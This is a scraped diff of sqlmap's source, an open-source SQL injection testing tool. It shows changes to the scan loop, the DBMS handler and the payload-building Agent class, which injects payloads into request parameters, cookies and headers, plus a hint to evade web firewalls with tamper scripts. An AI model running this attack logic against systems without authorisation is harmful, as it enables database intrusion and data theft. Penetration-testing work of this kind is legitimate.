firstPart = targetUrl[:targetUrl.find("?")]
|
firstPart = targetUrl[:targetUrl.find("?")]
|
||||||
secondPart = targetUrl[targetUrl.find("?") + 1:]
|
secondPart = targetUrl[targetUrl.find("?") + 1:]
|
||||||
|
@ -345,6 +361,7 @@ def start():
|
||||||
if not test or test[0] in ("y", "Y"):
|
if not test or test[0] in ("y", "Y"):
|
||||||
pass
|
pass
|
||||||
elif test[0] in ("n", "N"):
|
elif test[0] in ("n", "N"):
|
||||||
|
dataToStdout(os.linesep)
|
||||||
continue
|
continue
|
||||||
elif test[0] in ("q", "Q"):
|
elif test[0] in ("q", "Q"):
|
||||||
break
|
break
|
||||||
|
@ -357,8 +374,7 @@ def start():
|
||||||
if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
|
if not checkConnection(suppressOutput=conf.forms) or not checkString() or not checkRegexp():
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if conf.checkWaf:
|
checkWaf()
|
||||||
checkWaf()
|
|
||||||
|
|
||||||
if conf.identifyWaf:
|
if conf.identifyWaf:
|
||||||
identifyWaf()
|
identifyWaf()
|
||||||
|
@ -416,6 +432,8 @@ def start():
|
||||||
|
|
||||||
paramDict = conf.paramDict[place]
|
paramDict = conf.paramDict[place]
|
||||||
|
|
||||||
|
paramType = conf.method if conf.method not in (None, HTTPMETHOD.GET, HTTPMETHOD.POST) else place
|
||||||
|
|
||||||
for parameter, value in paramDict.items():
|
for parameter, value in paramDict.items():
|
||||||
if not proceed:
|
if not proceed:
|
||||||
break
|
break
|
||||||
|
@ -427,7 +445,7 @@ def start():
|
||||||
if paramKey in kb.testedParams:
|
if paramKey in kb.testedParams:
|
||||||
testSqlInj = False
|
testSqlInj = False
|
||||||
|
|
||||||
infoMsg = "skipping previously processed %s parameter '%s'" % (place, parameter)
|
infoMsg = "skipping previously processed %s parameter '%s'" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
elif parameter in conf.testParameter:
|
elif parameter in conf.testParameter:
|
||||||
|
@ -436,45 +454,60 @@ def start():
|
||||||
elif parameter == conf.rParam:
|
elif parameter == conf.rParam:
|
||||||
testSqlInj = False
|
testSqlInj = False
|
||||||
|
|
||||||
infoMsg = "skipping randomizing %s parameter '%s'" % (place, parameter)
|
infoMsg = "skipping randomizing %s parameter '%s'" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
elif parameter in conf.skip:
|
elif parameter in conf.skip:
|
||||||
testSqlInj = False
|
testSqlInj = False
|
||||||
|
|
||||||
infoMsg = "skipping %s parameter '%s'" % (place, parameter)
|
infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
elif parameter == conf.csrfToken:
|
||||||
|
testSqlInj = False
|
||||||
|
|
||||||
|
infoMsg = "skipping anti-CSRF token parameter '%s'" % parameter
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
# Ignore session-like parameters for --level < 4
|
# Ignore session-like parameters for --level < 4
|
||||||
elif conf.level < 4 and parameter.upper() in IGNORE_PARAMETERS:
|
elif conf.level < 4 and (parameter.upper() in IGNORE_PARAMETERS or parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX)):
|
||||||
testSqlInj = False
|
testSqlInj = False
|
||||||
|
|
||||||
infoMsg = "ignoring %s parameter '%s'" % (place, parameter)
|
infoMsg = "ignoring %s parameter '%s'" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech:
|
elif PAYLOAD.TECHNIQUE.BOOLEAN in conf.tech or conf.skipStatic:
|
||||||
check = checkDynParam(place, parameter, value)
|
check = checkDynParam(place, parameter, value)
|
||||||
|
|
||||||
if not check:
|
if not check:
|
||||||
warnMsg = "%s parameter '%s' does not appear dynamic" % (place, parameter)
|
warnMsg = "%s parameter '%s' does not appear dynamic" % (paramType, parameter)
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
if conf.skipStatic:
|
||||||
|
infoMsg = "skipping static %s parameter '%s'" % (paramType, parameter)
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
testSqlInj = False
|
||||||
else:
|
else:
|
||||||
infoMsg = "%s parameter '%s' is dynamic" % (place, parameter)
|
infoMsg = "%s parameter '%s' is dynamic" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
kb.testedParams.add(paramKey)
|
kb.testedParams.add(paramKey)
|
||||||
|
|
||||||
if testSqlInj:
|
if testSqlInj:
|
||||||
|
if place == PLACE.COOKIE:
|
||||||
|
pushValue(kb.mergeCookies)
|
||||||
|
kb.mergeCookies = False
|
||||||
|
|
||||||
check = heuristicCheckSqlInjection(place, parameter)
|
check = heuristicCheckSqlInjection(place, parameter)
|
||||||
|
|
||||||
if check != HEURISTIC_TEST.POSITIVE:
|
if check != HEURISTIC_TEST.POSITIVE:
|
||||||
if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
|
if conf.smart or (kb.ignoreCasted and check == HEURISTIC_TEST.CASTED):
|
||||||
infoMsg = "skipping %s parameter '%s'" % (place, parameter)
|
infoMsg = "skipping %s parameter '%s'" % (paramType, parameter)
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
infoMsg = "testing for SQL injection on %s " % place
|
infoMsg = "testing for SQL injection on %s " % paramType
|
||||||
infoMsg += "parameter '%s'" % parameter
|
infoMsg += "parameter '%s'" % parameter
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
|
@ -497,10 +530,13 @@ def start():
|
||||||
paramKey = (conf.hostname, conf.path, None, None)
|
paramKey = (conf.hostname, conf.path, None, None)
|
||||||
kb.testedParams.add(paramKey)
|
kb.testedParams.add(paramKey)
|
||||||
else:
|
else:
|
||||||
warnMsg = "%s parameter '%s' is not " % (place, parameter)
|
warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
|
||||||
warnMsg += "injectable"
|
warnMsg += "injectable"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
if place == PLACE.COOKIE:
|
||||||
|
kb.mergeCookies = popValue()
|
||||||
|
|
||||||
if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None):
|
if len(kb.injections) == 0 or (len(kb.injections) == 1 and kb.injections[0].place is None):
|
||||||
if kb.vainRun and not conf.multipleTargets:
|
if kb.vainRun and not conf.multipleTargets:
|
||||||
errMsg = "no parameter(s) found for testing in the provided data "
|
errMsg = "no parameter(s) found for testing in the provided data "
|
||||||
|
@ -545,14 +581,19 @@ def start():
|
||||||
elif conf.string:
|
elif conf.string:
|
||||||
errMsg += " Also, you can try to rerun by providing a "
|
errMsg += " Also, you can try to rerun by providing a "
|
||||||
errMsg += "valid value for option '--string' as perhaps the string you "
|
errMsg += "valid value for option '--string' as perhaps the string you "
|
||||||
errMsg += "have choosen does not match "
|
errMsg += "have chosen does not match "
|
||||||
errMsg += "exclusively True responses"
|
errMsg += "exclusively True responses"
|
||||||
elif conf.regexp:
|
elif conf.regexp:
|
||||||
errMsg += " Also, you can try to rerun by providing a "
|
errMsg += " Also, you can try to rerun by providing a "
|
||||||
errMsg += "valid value for option '--regexp' as perhaps the regular "
|
errMsg += "valid value for option '--regexp' as perhaps the regular "
|
||||||
errMsg += "expression that you have choosen "
|
errMsg += "expression that you have chosen "
|
||||||
errMsg += "does not match exclusively True responses"
|
errMsg += "does not match exclusively True responses"
|
||||||
|
|
||||||
|
if not conf.tamper:
|
||||||
|
errMsg += " If you suspect that there is some kind of protection mechanism "
|
||||||
|
errMsg += "involved (e.g. WAF) maybe you could retry "
|
||||||
|
errMsg += "with an option '--tamper' (e.g. '--tamper=space2comment')"
|
||||||
|
|
||||||
raise SqlmapNotVulnerableException(errMsg)
|
raise SqlmapNotVulnerableException(errMsg)
|
||||||
else:
|
else:
|
||||||
# Flush the flag
|
# Flush the flag
|
||||||
|
@ -598,14 +639,14 @@ def start():
|
||||||
except SqlmapSilentQuitException:
|
except SqlmapSilentQuitException:
|
||||||
raise
|
raise
|
||||||
|
|
||||||
except SqlmapBaseException, e:
|
except SqlmapBaseException, ex:
|
||||||
e = getUnicode(e)
|
errMsg = getUnicode(ex.message)
|
||||||
|
|
||||||
if conf.multipleTargets:
|
if conf.multipleTargets:
|
||||||
e += ", skipping to the next %s" % ("form" if conf.forms else "URL")
|
errMsg += ", skipping to the next %s" % ("form" if conf.forms else "URL")
|
||||||
logger.error(e)
|
logger.error(errMsg)
|
||||||
else:
|
else:
|
||||||
logger.critical(e)
|
logger.critical(errMsg)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
finally:
|
finally:
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -71,9 +71,9 @@ def setHandler():
|
||||||
items.remove(_)
|
items.remove(_)
|
||||||
items.insert(0, _)
|
items.insert(0, _)
|
||||||
|
|
||||||
for name, aliases, Handler, Connector in items:
|
for dbms, aliases, Handler, Connector in items:
|
||||||
if conf.dbms and conf.dbms not in aliases:
|
if conf.dbms and conf.dbms.lower() != dbms and conf.dbms.lower() not in aliases:
|
||||||
debugMsg = "skipping test for %s" % name
|
debugMsg = "skipping test for %s" % dbms
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
continue
|
continue
|
||||||
|
|
||||||
|
@ -84,7 +84,7 @@ def setHandler():
|
||||||
logger.debug("forcing timeout to 10 seconds")
|
logger.debug("forcing timeout to 10 seconds")
|
||||||
conf.timeout = 10
|
conf.timeout = 10
|
||||||
|
|
||||||
dialect = DBMS_DICT[name][3]
|
dialect = DBMS_DICT[dbms][3]
|
||||||
|
|
||||||
if dialect:
|
if dialect:
|
||||||
sqlalchemy = SQLAlchemy(dialect=dialect)
|
sqlalchemy = SQLAlchemy(dialect=dialect)
|
||||||
|
@ -93,7 +93,10 @@ def setHandler():
|
||||||
if sqlalchemy.connector:
|
if sqlalchemy.connector:
|
||||||
conf.dbmsConnector = sqlalchemy
|
conf.dbmsConnector = sqlalchemy
|
||||||
else:
|
else:
|
||||||
conf.dbmsConnector.connect()
|
try:
|
||||||
|
conf.dbmsConnector.connect()
|
||||||
|
except NameError:
|
||||||
|
pass
|
||||||
else:
|
else:
|
||||||
conf.dbmsConnector.connect()
|
conf.dbmsConnector.connect()
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,7 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
@ -10,6 +10,7 @@ import re
|
||||||
from lib.core.common import Backend
|
from lib.core.common import Backend
|
||||||
from lib.core.common import extractRegexResult
|
from lib.core.common import extractRegexResult
|
||||||
from lib.core.common import getSQLSnippet
|
from lib.core.common import getSQLSnippet
|
||||||
|
from lib.core.common import getUnicode
|
||||||
from lib.core.common import isDBMSVersionAtLeast
|
from lib.core.common import isDBMSVersionAtLeast
|
||||||
from lib.core.common import isNumber
|
from lib.core.common import isNumber
|
||||||
from lib.core.common import isTechniqueAvailable
|
from lib.core.common import isTechniqueAvailable
|
||||||
|
@ -19,6 +20,7 @@ from lib.core.common import safeSQLIdentificatorNaming
|
||||||
from lib.core.common import singleTimeWarnMessage
|
from lib.core.common import singleTimeWarnMessage
|
||||||
from lib.core.common import splitFields
|
from lib.core.common import splitFields
|
||||||
from lib.core.common import unArrayizeValue
|
from lib.core.common import unArrayizeValue
|
||||||
|
from lib.core.common import urlencode
|
||||||
from lib.core.common import zeroDepthSearch
|
from lib.core.common import zeroDepthSearch
|
||||||
from lib.core.data import conf
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
|
@ -26,11 +28,15 @@ from lib.core.data import queries
|
||||||
from lib.core.dicts import DUMP_DATA_PREPROCESS
|
from lib.core.dicts import DUMP_DATA_PREPROCESS
|
||||||
from lib.core.dicts import FROM_DUMMY_TABLE
|
from lib.core.dicts import FROM_DUMMY_TABLE
|
||||||
from lib.core.enums import DBMS
|
from lib.core.enums import DBMS
|
||||||
|
from lib.core.enums import HTTP_HEADER
|
||||||
from lib.core.enums import PAYLOAD
|
from lib.core.enums import PAYLOAD
|
||||||
from lib.core.enums import PLACE
|
from lib.core.enums import PLACE
|
||||||
from lib.core.enums import POST_HINT
|
from lib.core.enums import POST_HINT
|
||||||
from lib.core.exception import SqlmapNoneDataException
|
from lib.core.exception import SqlmapNoneDataException
|
||||||
|
from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
|
||||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||||
|
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||||
|
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||||
from lib.core.settings import GENERIC_SQL_COMMENT
|
from lib.core.settings import GENERIC_SQL_COMMENT
|
||||||
from lib.core.settings import PAYLOAD_DELIMITER
|
from lib.core.settings import PAYLOAD_DELIMITER
|
||||||
from lib.core.settings import REPLACEMENT_MARKER
|
from lib.core.settings import REPLACEMENT_MARKER
|
||||||
|
@ -44,10 +50,10 @@ class Agent(object):
|
||||||
def payloadDirect(self, query):
|
def payloadDirect(self, query):
|
||||||
query = self.cleanupPayload(query)
|
query = self.cleanupPayload(query)
|
||||||
|
|
||||||
if query.startswith("AND "):
|
if query.upper().startswith("AND "):
|
||||||
query = query.replace("AND ", "SELECT ", 1)
|
query = re.sub(r"(?i)AND ", "SELECT ", query, 1)
|
||||||
elif query.startswith(" UNION ALL "):
|
elif query.upper().startswith(" UNION ALL "):
|
||||||
query = query.replace(" UNION ALL ", "", 1)
|
query = re.sub(r"(?i) UNION ALL ", "", query, 1)
|
||||||
elif query.startswith("; "):
|
elif query.startswith("; "):
|
||||||
query = query.replace("; ", "", 1)
|
query = query.replace("; ", "", 1)
|
||||||
|
|
||||||
|
@ -84,7 +90,7 @@ class Agent(object):
|
||||||
|
|
||||||
paramString = conf.parameters[place]
|
paramString = conf.parameters[place]
|
||||||
paramDict = conf.paramDict[place]
|
paramDict = conf.paramDict[place]
|
||||||
origValue = paramDict[parameter]
|
origValue = getUnicode(paramDict[parameter])
|
||||||
|
|
||||||
if place == PLACE.URI:
|
if place == PLACE.URI:
|
||||||
paramString = origValue
|
paramString = origValue
|
||||||
|
@ -98,14 +104,26 @@ class Agent(object):
|
||||||
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
||||||
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
|
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
|
||||||
origValue = origValue.split('>')[-1]
|
origValue = origValue.split('>')[-1]
|
||||||
elif kb.postHint == POST_HINT.JSON:
|
elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
|
||||||
origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)(?P<result>[^"]+\Z)', origValue)
|
origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)\s*(?P<result>[^"\[,]+\Z)', origValue)
|
||||||
else:
|
else:
|
||||||
origValue = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"]+\Z)", origValue)
|
_ = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"&]+\Z)", origValue) or ""
|
||||||
|
origValue = _.split('=', 1)[1] if '=' in _ else ""
|
||||||
elif place == PLACE.CUSTOM_HEADER:
|
elif place == PLACE.CUSTOM_HEADER:
|
||||||
paramString = origValue
|
paramString = origValue
|
||||||
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
||||||
origValue = origValue[origValue.index(',') + 1:]
|
origValue = origValue[origValue.index(',') + 1:]
|
||||||
|
match = re.search(r"([^;]+)=(?P<value>[^;]+);?\Z", origValue)
|
||||||
|
if match:
|
||||||
|
origValue = match.group("value")
|
||||||
|
elif ',' in paramString:
|
||||||
|
header = paramString.split(',')[0]
|
||||||
|
|
||||||
|
if header.upper() == HTTP_HEADER.AUTHORIZATION.upper():
|
||||||
|
origValue = origValue.split(' ')[-1].split(':')[-1]
|
||||||
|
|
||||||
|
if conf.prefix:
|
||||||
|
value = origValue
|
||||||
|
|
||||||
if value is None:
|
if value is None:
|
||||||
if where == PAYLOAD.WHERE.ORIGINAL:
|
if where == PAYLOAD.WHERE.ORIGINAL:
|
||||||
|
@ -117,7 +135,9 @@ class Agent(object):
|
||||||
_ = randomInt(2)
|
_ = randomInt(2)
|
||||||
value = "%s%s AND %s=%s" % (origValue, match.group() if match else "", _, _ + 1)
|
value = "%s%s AND %s=%s" % (origValue, match.group() if match else "", _, _ + 1)
|
||||||
elif conf.invalidBignum:
|
elif conf.invalidBignum:
|
||||||
value = "%d.%d" % (randomInt(6), randomInt(1))
|
value = randomInt(6)
|
||||||
|
elif conf.invalidString:
|
||||||
|
value = randomStr(6)
|
||||||
else:
|
else:
|
||||||
if newValue.startswith("-"):
|
if newValue.startswith("-"):
|
||||||
value = ""
|
value = ""
|
||||||
|
@ -136,14 +156,40 @@ class Agent(object):
|
||||||
_ = "%s%s" % (origValue, CUSTOM_INJECTION_MARK_CHAR)
|
_ = "%s%s" % (origValue, CUSTOM_INJECTION_MARK_CHAR)
|
||||||
if kb.postHint == POST_HINT.JSON and not isNumber(newValue) and not '"%s"' % _ in paramString:
|
if kb.postHint == POST_HINT.JSON and not isNumber(newValue) and not '"%s"' % _ in paramString:
|
||||||
newValue = '"%s"' % newValue
|
newValue = '"%s"' % newValue
|
||||||
|
elif kb.postHint == POST_HINT.JSON_LIKE and not isNumber(newValue) and not "'%s'" % _ in paramString:
|
||||||
|
newValue = "'%s'" % newValue
|
||||||
newValue = newValue.replace(CUSTOM_INJECTION_MARK_CHAR, REPLACEMENT_MARKER)
|
newValue = newValue.replace(CUSTOM_INJECTION_MARK_CHAR, REPLACEMENT_MARKER)
|
||||||
retVal = paramString.replace(_, self.addPayloadDelimiters(newValue))
|
retVal = paramString.replace(_, self.addPayloadDelimiters(newValue))
|
||||||
retVal = retVal.replace(CUSTOM_INJECTION_MARK_CHAR, "").replace(REPLACEMENT_MARKER, CUSTOM_INJECTION_MARK_CHAR)
|
retVal = retVal.replace(CUSTOM_INJECTION_MARK_CHAR, "").replace(REPLACEMENT_MARKER, CUSTOM_INJECTION_MARK_CHAR)
|
||||||
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
|
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
|
||||||
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
|
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
|
||||||
else:
|
else:
|
||||||
retVal = paramString.replace("%s=%s" % (parameter, origValue),
|
def _(pattern, repl, string):
|
||||||
"%s=%s" % (parameter, self.addPayloadDelimiters(newValue)))
|
retVal = string
|
||||||
|
match = None
|
||||||
|
for match in re.finditer(pattern, string):
|
||||||
|
pass
|
||||||
|
|
||||||
|
if match:
|
||||||
|
while True:
|
||||||
|
_ = re.search(r"\\g<([^>]+)>", repl)
|
||||||
|
if _:
|
||||||
|
repl = repl.replace(_.group(0), match.group(int(_.group(1)) if _.group(1).isdigit() else _.group(1)))
|
||||||
|
else:
|
||||||
|
break
|
||||||
|
retVal = string[:match.start()] + repl + string[match.end():]
|
||||||
|
return retVal
|
||||||
|
|
||||||
|
if origValue:
|
||||||
|
regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "")
|
||||||
|
retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
|
||||||
|
else:
|
||||||
|
retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
|
||||||
|
if retVal == paramString and urlencode(parameter) != parameter:
|
||||||
|
retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString)
|
||||||
|
|
||||||
|
if retVal:
|
||||||
|
retVal = retVal.replace(BOUNDARY_BACKSLASH_MARKER, '\\')
|
||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
@ -176,7 +222,7 @@ class Agent(object):
|
||||||
|
|
||||||
# If we are replacing (<where>) the parameter original value with
|
# If we are replacing (<where>) the parameter original value with
|
||||||
# our payload do not prepend with the prefix
|
# our payload do not prepend with the prefix
|
||||||
if where == PAYLOAD.WHERE.REPLACE:
|
if where == PAYLOAD.WHERE.REPLACE and not conf.prefix:
|
||||||
query = ""
|
query = ""
|
||||||
|
|
||||||
# If the technique is stacked queries (<stype>) do not put a space
|
# If the technique is stacked queries (<stype>) do not put a space
|
||||||
|
@ -192,10 +238,11 @@ class Agent(object):
|
||||||
else:
|
else:
|
||||||
query = kb.injection.prefix or prefix or ""
|
query = kb.injection.prefix or prefix or ""
|
||||||
|
|
||||||
if not (expression and expression[0] == ";"):
|
if not (expression and expression[0] == ';') and not (query and query[-1] in ('(', ')') and expression and expression[0] in ('(', ')')) and not (query and query[-1] == '('):
|
||||||
query += " "
|
query += " "
|
||||||
|
|
||||||
query = "%s%s" % (query, expression)
|
if query:
|
||||||
|
query = "%s%s" % (query.replace('\\', BOUNDARY_BACKSLASH_MARKER), expression)
|
||||||
|
|
||||||
return query
|
return query
|
||||||
|
|
||||||
|
@ -225,11 +272,11 @@ class Agent(object):
|
||||||
|
|
||||||
# If we are replacing (<where>) the parameter original value with
|
# If we are replacing (<where>) the parameter original value with
|
||||||
# our payload do not append the suffix
|
# our payload do not append the suffix
|
||||||
if where == PAYLOAD.WHERE.REPLACE:
|
if where == PAYLOAD.WHERE.REPLACE and not conf.suffix:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
elif suffix and not comment:
|
elif suffix and not comment:
|
||||||
expression += " %s" % suffix
|
expression += suffix.replace('\\', BOUNDARY_BACKSLASH_MARKER)
|
||||||
|
|
||||||
return re.sub(r"(?s);\W*;", ";", expression)
|
return re.sub(r"(?s);\W*;", ";", expression)
|
||||||
|
|
||||||
|
@ -251,7 +298,7 @@ class Agent(object):
|
||||||
payload = payload.replace(_, randomStr())
|
payload = payload.replace(_, randomStr())
|
||||||
|
|
||||||
if origValue is not None:
|
if origValue is not None:
|
||||||
payload = payload.replace("[ORIGVALUE]", origValue if origValue.isdigit() else "'%s'" % origValue)
|
payload = payload.replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))
|
||||||
|
|
||||||
if "[INFERENCE]" in payload:
|
if "[INFERENCE]" in payload:
|
||||||
if Backend.getIdentifiedDbms() is not None:
|
if Backend.getIdentifiedDbms() is not None:
|
||||||
|
@ -266,7 +313,7 @@ class Agent(object):
|
||||||
inferenceQuery = inference.query
|
inferenceQuery = inference.query
|
||||||
|
|
||||||
payload = payload.replace("[INFERENCE]", inferenceQuery)
|
payload = payload.replace("[INFERENCE]", inferenceQuery)
|
||||||
else:
|
elif not kb.testMode:
|
||||||
errMsg = "invalid usage of inference payload without "
|
errMsg = "invalid usage of inference payload without "
|
||||||
errMsg += "knowledge of underlying DBMS"
|
errMsg += "knowledge of underlying DBMS"
|
||||||
raise SqlmapNoneDataException(errMsg)
|
raise SqlmapNoneDataException(errMsg)
|
||||||
|
@ -351,7 +398,8 @@ class Agent(object):
|
||||||
else:
|
else:
|
||||||
nulledCastedField = rootQuery.isnull.query % nulledCastedField
|
nulledCastedField = rootQuery.isnull.query % nulledCastedField
|
||||||
|
|
||||||
if conf.hexConvert or conf.binaryFields and field in conf.binaryFields.split(','):
|
kb.binaryField = conf.binaryFields and field in conf.binaryFields.split(',')
|
||||||
|
if conf.hexConvert or kb.binaryField:
|
||||||
nulledCastedField = self.hexConvertField(nulledCastedField)
|
nulledCastedField = self.hexConvertField(nulledCastedField)
|
||||||
|
|
||||||
return nulledCastedField
|
return nulledCastedField
|
||||||
|
@ -814,6 +862,9 @@ class Agent(object):
|
||||||
@rtype: C{str}
|
@rtype: C{str}
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
if " FROM " not in query:
|
||||||
|
return query
|
||||||
|
|
||||||
limitedQuery = query
|
limitedQuery = query
|
||||||
limitStr = queries[Backend.getIdentifiedDbms()].limit.query
|
limitStr = queries[Backend.getIdentifiedDbms()].limit.query
|
||||||
fromIndex = limitedQuery.index(" FROM ")
|
fromIndex = limitedQuery.index(" FROM ")
|
||||||
|
@ -943,33 +994,35 @@ class Agent(object):
|
||||||
|
|
||||||
return caseExpression
|
return caseExpression
|
||||||
|
|
||||||
def addPayloadDelimiters(self, inpStr):
|
def addPayloadDelimiters(self, value):
|
||||||
"""
|
"""
|
||||||
Adds payload delimiters around the input string
|
Adds payload delimiters around the input string
|
||||||
"""
|
"""
|
||||||
|
|
||||||
return "%s%s%s" % (PAYLOAD_DELIMITER, inpStr, PAYLOAD_DELIMITER) if inpStr else inpStr
|
return "%s%s%s" % (PAYLOAD_DELIMITER, value, PAYLOAD_DELIMITER) if value else value
|
||||||
|
|
||||||
def removePayloadDelimiters(self, inpStr):
|
def removePayloadDelimiters(self, value):
|
||||||
"""
|
"""
|
||||||
Removes payload delimiters from inside the input string
|
Removes payload delimiters from inside the input string
|
||||||
"""
|
"""
|
||||||
|
|
||||||
return inpStr.replace(PAYLOAD_DELIMITER, '') if inpStr else inpStr
|
return value.replace(PAYLOAD_DELIMITER, '') if value else value
|
||||||
|
|
||||||
def extractPayload(self, inpStr):
|
def extractPayload(self, value):
|
||||||
"""
|
"""
|
||||||
Extracts payload from inside of the input string
|
Extracts payload from inside of the input string
|
||||||
"""
|
"""
|
||||||
|
|
||||||
return extractRegexResult("(?s)%s(?P<result>.*?)%s" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), inpStr)
|
_ = re.escape(PAYLOAD_DELIMITER)
|
||||||
|
return extractRegexResult("(?s)%s(?P<result>.*?)%s" % (_, _), value)
|
||||||
|
|
||||||
def replacePayload(self, inpStr, payload):
|
def replacePayload(self, value, payload):
|
||||||
"""
|
"""
|
||||||
Replaces payload inside the input string with a given payload
|
Replaces payload inside the input string with a given payload
|
||||||
"""
|
"""
|
||||||
|
|
||||||
return re.sub("(%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), inpStr) if inpStr else inpStr
|
_ = re.escape(PAYLOAD_DELIMITER)
|
||||||
|
return re.sub("(?s)(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value
|
||||||
|
|
||||||
def runAsDBMSUser(self, query):
|
def runAsDBMSUser(self, query):
|
||||||
if conf.dbmsCred and "Ad Hoc Distributed Queries" not in query:
|
if conf.dbmsCred and "Ad Hoc Distributed Queries" not in query:
|
||||||
|
|
|
@ -1,15 +1,36 @@
|
||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'doc/COPYING' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
try:
|
||||||
|
import cPickle as pickle
|
||||||
|
except:
|
||||||
|
import pickle
|
||||||
|
|
||||||
|
import itertools
|
||||||
import os
|
import os
|
||||||
import pickle
|
import sys
|
||||||
import tempfile
|
import tempfile
|
||||||
|
|
||||||
